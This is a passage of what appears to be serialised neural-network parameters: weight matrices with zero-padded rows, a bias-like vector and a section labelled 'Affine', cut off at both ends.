0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.1036, -0.072, 0.0896, -0.05435, 0.0914, -0.10046, 0.5874, 0.2426, -0.2712, 0.1313, -0.03336, -0.05667, -0.0901, 0.10065, -0.1174, -0.04797, -0.001166, 0.2244, -0.1311, 0.0708, 0.112, -0.05707, 0.4226, -0.35, 1.158, 0.0002906, 0.0681, 0.013855, -0.11395, 0.02821, -0.11053, -0.1154, -0.0223, 0.2827, -0.1307, 0.00399, 0.3125, 0.07477, -0.3333, -0.1545, -0.04248, -0.121, -0.05402, 0.1836, 0.04077, -0.02129, 0.01513, 0.04218, 0.468, 0.11847], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.501, 0.126, -1.184, 0.05023, 0.0665, -0.1658, 0.917, -0.1392, -0.04062, 0.00957, 0.001741, 0.001966, 0.1396, -0.587, -0.1709, 0.4746, 0.2086, 0.3333, -0.4084, 0.0925, -1.51, -0.1942, 0.1354, -0.3792, 0.4028, 0.2164, 0.07855, 0.02278, -0.4297, -0.6885, -1.594, 0.153, 0.1641, 0.251, 0.5757, -3.78, -2.549, -0.1475, 0.3752, -0.326, -4.105, -0.224, -0.04684, -0.1924, -0.4707, 0.1156, 0.498, 0.2246, 0.5967, 0.0949], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.8115, 0.0782, 0.1405, -0.3604, 0.436, -0.2886, 0.4397, 0.5596, -0.681, 0.4336, -0.1378, 0.151, -0.0731, 0.3416, -0.0103, 0.526, -0.0704, 0.4429, -0.271, 0.243, 0.4805, 0.01889, 0.9766, -0.4812, 0.721, 0.2375, 0.0792, -0.00983, 0.6343, -0.36, -0.01487, -0.02597, -0.8403, -0.07935, 0.3499, -0.2798, 0.607, 0.0323, -0.44, -0.2917, 0.1338, 0.2023, -0.2133, 0.0957, 0.2585, -0.06018, -0.0883, 0.10315, -0.3596, -0.1542], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.02264, -0.0404, -0.3733, -0.01613, -0.11993, 0.01668, -0.03345, -0.0714, -0.071, 0.0666, -0.1, -0.027, 0.0373, 0.09106, 0.03635, 0.02267, 0.0223, -0.4553, -0.0834, 0.0345, -0.1079, 0.071, 0.434, -0.05054, 0.1406, 0.0476, -0.1176, 0.02644, -0.00532, 0.03598, 0.00957, -0.1459, -0.1008, -0.409, -0.05566, -0.057, 0.05045, -0.2019, -0.00699, -0.03415, 0.03806, -0.008194, -0.1438, -0.04944, -0.05002, -0.0332, -0.01917, -0.04593, 0.010345, -0.03026], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.00688, 0.08044, -0.337, -0.0332, 0.1492, 0.0948, 0.4407, 0.4993, 0.004562, 0.1656, -0.04123, 0.011795, 0.03937, -0.38, -0.1841, 0.02129, 0.011086, 0.00693, -0.4192, 0.2507, 0.1362, 0.0627, -1.212, -0.2003, -1.366, -0.07007, 0.04175, -0.07043, 0.04364, -0.4712, -0.01723, 0.0364, 0.03117, -0.02536, -0.08386, 0.126, 0.822, 0.016, 0.0718, 0.01029, -0.02562, 0.0231, -0.587, 0.004734, -1.482, -0.03522, -0.03165, -0.2368, 0.4634, -0.1294], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.03235, -0.002546, 0.02834, -0.00856, -0.05878, 0.03186, -0.1891, -0.05652, -0.05356, -0.1329, -0.008995, -0.01862, 0.03812, -0.02151, 0.008286, -0.3699, 0.00663, -0.000765, 0.02092, 0.2247, -0.06323, -0.077, -0.03708, -0.01269, -0.8667, -0.0341, -0.04874, -0.03082, -0.0738, -0.0174, -0.005417, -0.0609, -0.02257, 0.00817, -0.1078, 0.003721, -0.0889, 0.07056, 0.0585, -0.06088, 0.01205, -0.0003042, -0.1653, 0.00746, 0.02281, 0.004807, -0.02008, 0.0193, -0.2632, -0.1384], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.11176, -0.0781, -0.2146, -0.02098, 0.363, 0.1436, -0.03268, 0.013306, 0.0909, -0.2517, -0.08997, -0.03105, -0.08984, 0.0972, -0.1459, -0.1043, -0.003141, -0.07666, -0.04254, 0.0964, 0.09576, 0.00506, 0.010895, 0.08716, 1.22, -0.10284, 0.03827, -0.03745, -0.04343, -0.006454, -0.008, 0.02586, 0.1343, 0.172, 0.012054, 0.06137, -0.1515, -0.0005636, -0.1334, -0.1482, -0.1332, 0.00525, -0.0646, -0.03577, -0.0437, -0.02693, 0.005283, 0.078, 0.1835, -0.08844], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.5605, -0.1179, 0.1719, -0.04175, -0.826, -0.3105, -0.1832, 0.3281, -0.6953, 0.1898, -0.01127, -0.1537, -1.057, 0.3357, 0.4463, -0.6475, -0.02995, 0.7495, -0.147, 0.3076, 0.2235, -0.0857, -0.3872, -0.356, -0.4832, -0.1431, 0.5117, 0.1857, 0.3281, -0.406, -0.09406, 0.013245, -0.4048, -0.1646, -0.0322, -0.05252, 0.2886, 0.2073, -0.3457, 0.0863, -0.1067, 0.3943, -0.326, -0.2479, 0.03952, -0.203, -0.387, -0.1184, -0.4507, 0.0928], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0441, -0.04245, -0.00868, -0.03976, 0.1176, 0.04648, -0.193, 0.0964, 0.00378, -0.122, 0.00778, -0.03534, 0.1122, -0.0689, 0.08594, -0.145, -0.00852, 0.1097, 0.005783, -0.0317, -0.11316, 0.0668, 0.274, -8.47, 3.498, 0.04068, 0.33, -0.06256, 0.01054, -0.10254, -0.02051, -0.1575, -0.04453, 0.4973, -0.1703, -0.04727, -0.015175, -0.0994, 0.0411, -0.055, 0.01351, -0.1948, 0.0766, 0.00794, 0.02377, 0.005795, 0.003504, -0.2583, -0.3513, 0.142], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.003063, -0.00597, 0.00479, -0.02278, 0.01284, 0.00806, 0.04526, -0.02252, -0.002087, -0.0881, 0.002043, -0.01418, -0.0459, 0.02554, 0.00681, 0.0392, 0.003325, 0.011284, -0.006107, 0.148, -0.10876, -0.01207, 0.112, 0.03824, -0.5728, 0.00605, 0.01036, 0.0002704, -0.03775, 0.2795, -0.015274, -0.084, -0.01775, 0.02557, -0.0602, -0.00746, 0.03366, -0.01996, 0.125, -0.0654, 0.005543, -0.02026, -0.009315, 0.02875, 0.02165, -0.01712, -0.003292, -0.00998, 0.0968, 0.02003], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.1123, 0.01639, -0.0391, 0.01642, 0.02646, -1.624, 0.07855, -0.0401, -0.03482, -4.977, 0.005463, -0.0536, 0.2336, -0.01142, 0.0807, 0.1039, 0.01802, 0.0448, -0.0781, 0.01119, -0.1565, -0.01825, 0.2443, -0.2262, -0.1433, -0.05417, -0.305, -0.0167, 0.01964, -0.3289, -0.0773, 0.0744, 0.04916, 0.1393, 0.05087, 0.01785, 0.1255, 0.08856, -0.07324, 0.0369, -0.1032, 0.03644, -0.03177, -0.302, -0.1007, -0.06207, -0.05444, -0.03732, -0.2754, 0.03099], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.4465, 0.38, -1.018, -0.09595, -0.5317, 1.819, 1.727, -0.3225, -3.002, -1.588, -1.07, 0.2441, -0.5566, -0.9473, 0.1237, 2.35, -0.681, 2.287, 0.421, -0.3005, 0.09894, -0.6934, 2.828, -7.105, -1.952, 0.1356, -1.655, -0.05124, -0.1335, 1.072, 0.5386, 1.471, -0.435, 0.7476, 0.7407, -0.781, 0.563, 0.2399, 1.496, -0.515, -1.268, -1.347, 0.706, 0.1803, 0.0745, 0.2922, -0.09485, -2.402, 1.9, 0.2405], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.00875, -0.01281, 0.010605, -0.01314, 0.0611, -0.03702, -0.392, -0.1335, 0.00801, -0.0552, -0.006386, -0.01436, 0.10236, 0.00581, -0.02898, 0.1489, 1.4e-06, -0.02628, 0.01633, 0.1481, -0.02267, -0.005222, 0.02605, -0.236, 0.1602, 0.0211, 0.527, -0.10443, -0.03143, -0.0603, -0.0081, 0.05182, -0.002096, -0.1395, -0.0467, -0.05893, 0.08124, -0.0771, -0.10254, -0.0518, 0.01665, 0.04086, -0.02795, -0.0871, -0.004433, -0.02858, -0.007275, 0.04236, 0.1589, 0.02573], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.0362, -0.005775, -0.01037, -0.02475, -0.2219, -0.2983, -0.00372, 0.10016, -0.05685, -0.0673, -0.002478, 0.03568, 0.09344, 0.02524, -0.0761, 0.3945, 0.00696, -0.03436, 0.02844, 0.1981, 0.05743, -0.02495, 0.2327, -0.06256, -0.4917, -0.08325, 0.1276, 0.03867, -0.05295, -0.0361, -0.03848, -0.0432, 0.0503, 0.03818, -0.09546, -0.00847, 0.2406, 0.05338, 0.01703, -0.1675, 0.01292, -0.0881, 0.01775, 0.1492, 0.0674, -0.05618, -0.03918, 0.0233, -0.2277, -0.1191], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.335, -0.11395, -0.279, -0.3872, 0.4045, -1.1875, 0.06085, -0.0178, -0.06213, 0.6, 0.106, 0.01607, 0.04077, 0.3047, -0.0433, -0.2922, -0.2546, 0.1604, -0.2118, 0.4546, 0.10565, 0.1416, -0.3289, -0.4736, 0.03125, 0.05493, 0.05673, -0.141, -0.0629, 0.3142, -0.0987, 0.0319, -0.1001, 0.1481, 0.2156, 0.1838, -1.526, 0.0807, -0.1606, -0.3992, -1.895, 0.291, -0.1652, -0.197, -0.4978, -0.4246, -0.03458, 0.1096, 0.6367, -0.1328], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.0985, -0.0703, -0.2332, -0.0523, 0.6704, 0.11426, -0.513, 0.1265, 0.08374, 0.1606, -0.03842, -0.04773, 0.243, 0.0954, -0.517, 0.346, 0.0963, -0.3015, -0.7026, 0.1387, -0.1561, 0.06726, 0.855, -0.1604, 0.6006, -0.3303, -0.233, -0.2546, -0.1688, 0.878, 0.03207, -0.0213, 0.388, -0.0368, -0.1353, 0.1815, -1.053, -0.2095, -0.3674, -0.3455, -0.155, -0.1875, 0.0272, 0.1382, 0.1912, -0.01258, -0.001796, 0.2345, 0.2578, -0.05542], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.0941, -0.0732, -0.0711, -0.004776, -0.07697, -0.1273, 0.2212, 0.1425, -0.02939, -0.3325, -0.02487, -0.07153, -0.1375, -0.0014105, -0.1119, -0.1743, 0.02145, -0.08405, 0.04108, 0.08777, -0.02261, -0.0965, -0.02567, 0.1298, -0.1708, -0.10333, 0.06506, -0.04813, -0.01268, 0.152, -0.0673, 0.1611, -0.0537, 0.03256, 0.01698, -0.04453, 0.10803, 0.0273, -0.1393, -0.0807, 0.0871, 0.05078, -0.00986, -0.0718, 0.08203, 0.02365, -0.03004, 0.148, 0.11554, -0.2339], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.01973, -1.97, -2.355, -2.002, 0.01544, -0.06, -0.2017, -0.2893, 0.0343, 0.00996, -0.01435, 0.01701, -2.287, -2.744, 0.0934, -0.04526, -0.007214, 0.07635, 0.04492, -0.12, -0.02055, 0.184, -0.08606, 0.0729, 0.004486, 0.02963, -0.2556, -0.00462, -0.03442, 0.261, -0.00659, 0.439, 0.08984, -1.519, -0.2217, -0.169, 0.6787, -0.004536, -0.1367, 0.04822, -0.0128, -0.009674, -0.00223, 0.1255, -0.3008, -0.0457, 0.01309, -0.2927, -3.576, 0.06586], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.1964, -0.05884, 0.05353, -0.07996, 0.2278, -0.2515, -0.5225, 0.3872, 0.1793, -0.2363, 0.00253, 0.01194, 0.01277, 0.07184, -0.006172, 0.3354, -0.05362, -0.001628, -0.08606, -0.0813, -0.04648, -0.1072, -2.373, -0.05844, 0.8984, -0.1396, 0.1752, -0.01308, 0.02663, -0.002003, -0.02791, -0.1421, -0.0785, 0.3457, -0.1813, -0.09985, 0.4595, 0.358, -0.3298, -0.1159, 0.11896, 0.01047, -0.2312, 0.358, 0.052, -0.1605, -0.1277, -0.1316, -0.5723, 0.1602], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.0408, -0.0165, -0.09216, -0.03818, 0.189, 0.01359, -0.02382, 0.0362, -0.04645, -0.2542, -0.04016, 0.0009494, -0.1156, 0.102, -0.01833, -0.0593, 0.00798, 0.12244, 0.02734, 0.194, -0.1276, 0.011856, -0.05414, 0.089, 0.8154, -0.05396, -0.047, -0.1152, -0.0419, 0.0993, -0.03757, 0.03357, -0.04422, 0.00572, -0.0987, -0.006855, -0.0194, 0.0665, -0.01559, -0.0884, 0.02332, 0.01596, -0.06094, -0.01643, 0.0837, -0.01385, -0.01102, 0.0928, 0.268, -0.207], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.10736, 0.0006046, -0.0998, 0.07275, -0.04755, 0.03836, -0.06885, -0.05405, -0.0686, -0.1351, -0.03757, 0.00742, 0.03363, -0.0509, -0.02864, -1.126, -0.04364, 0.02197, 0.1487, 0.2966, 0.259, 0.02104, -0.4558, 0.03177, -0.4111, 0.0652, 0.004913, 0.03998, -0.0974, -0.06012, 0.02635, 0.0691, 0.05267, 0.2211, 0.07214, -0.003101, -0.4778, -0.097, -0.325, -0.02808, -0.0712, -0.0431, -0.06033, 0.05075, 0.01878, 0.01904, -0.1461, -0.03577, 0.2208, -0.08624]]
[0.79272, -0.428153, -0.567115, 0.462776, 0.429849, 0.720483, 0.69446, 0.420893, 0.276775, -0.0450261, -0.236949, 0.205721, 0.196689, -0.983156, 0.336817, -0.320414, 0.54742, 0.424341, -0.0328367, -1.27605, 0.134177, -0.496039, -0.793922, -0.0675438, -1.54135, 1.0422, 0.385698, 0.512833, 0.522934, 0.442062, -0.152057, -0.0327146, 0.407894, -0.255591, 0.373435, 0.133794, -0.947453, 0.449173, 0.431082, 0.135475, -0.287404, 0.326842, 0.509046, -0.4848, -0.181305, 0.0782116, 0.0292489, 0.409646, 0.31647, -0.476785, 0.7925, -0.4282, -0.567, 0.463, 0.43, 0.7207, 0.6943, 0.421, 0.2769, -0.045, -0.2369, 0.2057, 0.1967, -0.9834, 0.337, -0.3203, 0.5474, 0.4243, -0.03284, -1.276, 0.1342, -0.496, -0.794, -0.06757, -1.541, 1.042, 0.3857, 0.5127, 0.523, 0.4421, -0.1521, -0.0327, 0.408, -0.2556, 0.3735, 0.1338, -0.9473, 0.4492, 0.4312, 0.1355, -0.2874, 0.327, 0.5093, -0.4849, -0.1813, 0.0782, 0.02925, 0.4097, 0.3164, -0.4768]
Affine
[[0.0941772, 0.0206205, 0.0454877, -0.0130585, 0.0194805, -0.0170711, -0.0143245, 0.0249675, 0.0756484, -0.00427519, 0.00566084, 0.0244007, 0.0058948, -0.00709324, -0.159555, -0.00863637, 0.0234278, 0.000805354, -0.00627873, -0.00573567, 0.00464331, 0.0303308, 0.0277112, 0.0202363, 0.0327938, 0.0104165, 0.00965242, -0.0125282, 0.0379563, 0.0128253, -0.000775597, 0.00199706, 0.0209984, 0.0168838, 0.0261015, 0.0104035, -0.0110812, 0.0109239, 0.0076338, -0.00337645, 0.0289941, 0.00667044, 0.0101479, 0.0309918, -0.0162677, 0.0611078, 0.0155817, 0.03502, 0.0480301, 0.0433048, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.00983424, 0.0183901, 0.0488533, -0.0251313, -0.00348321, -0.0141428, 0.011356, 0.00721295, 0.0185623, 0.0263413, 0.0324003, -0.0136974, 0.033804, 0.0198145, 0.0166059, 0.0213192, 0.0293032, -0.0110841, -0.0254637, 0.00227679, 0.0239456, 0.0148257, 0.0301141, 0.0175003, -0.00287978, -0.0040097, -0.0286925, -0.0232493, -0.00373392, 0.0280109, 0.0337948, 0.00479603, 0.0282058, 0.0232497, 0.029357, -0.000864247, -0.0290646, -0.00758103, 0.0246871, 0.0292543, -0.00106548, -0.021347, 0.0136794, 0.00440501, -0.00314558, 0.0548117, 0.00189486, 0.0339203, 0.0463755, 0.0459315, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.000389759, 0.0170986, 0.0395281, -0.0124504, 0.0287929, -0.0246987, -0.0152532, 0.0278293, 0.0203896, 0.0145775, 0.0378371, 0.0167214, -0.0133593, 0.0076429, -0.00280935, -0.00082434, 0.0220218, 0.0365586, 0.0135931, -0.0127598, -0.00277151, 0.0234785, -0.0237809, 0.0340398, 0.00738297, -0.00401344, -0.00312627, -0.00996829, 0.00301219, -0.00570863, 0.0363244, 0.000458648, 0.0197883, 0.0164605, 0.0158718, 0.041826, -0.00303705, 0.00148846, 0.0242171, -0.00900816, 0.00136113, 0.0137181, 0.0340229, 0.0269968, -0.0346718, 0.03487, 0.0161916, 0.0329476, 0.042933, 0.0463562, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-8.99262e-05, 0.0219759, 0.0467175, 0.00119732, -0.016021, -0.0040222, -0.0182821, 0.00779951, 0.00407066, 0.0383441, 0.00666298, 0.00736077, 0.0336862, 0.019123, -0.00263591, 0.0244777, -0.00370611, -0.0248593, 0.032772, 0.0235683, 0.0611264, 0.0203382, 0.0424083, 0.00818036, 0.0263418, -0.0267121, 0.0209093, 0.00492324, 0.000363205, -0.0154844, 0.0274986, 0.0293958, 0.00541331, 0.00406178, 0.023235, -0.00407373, -0.0498537, 0.00307776, 0.0312864, 0.0265198, 0.00179576, -0.00929097, 0.0328403, 0.0180819, 0.00449859, 0.0306559, 0.0104389, 0.0107805, 0.0148496, 0.0548102, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.000400471, 0.0288113, 0.0362769, -0.00558268, 0.0406523, -0.018869, -0.0231252, 0.0469694, 0.0116233, 3.04678e-06, 0.0293105, 0.000405112, -0.0328232, 0.00718625, -0.000963279, -0.0251201, 0.013112, 0.0549254, -0.0321416, -0.0208053, -0.0117772, 0.0193009, -0.0358258, 0.0324738, 0.00796046, 0.00122899, 0.0151451, -0.0186365, 0.00405614, -0.0141271, 0.0346932, -0.0132255, 0.0112013, 0.00890031, 0.0196268, 0.0606933, 0.0127086, 0.00279625, 0.026353, 0.00575114, 0.00151133, 0.0159128, 0.024307, 0.0507619, -0.0431437, 0.0278381, 0.0129052, 0.0189807, 0.0344196, 0.0438966, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 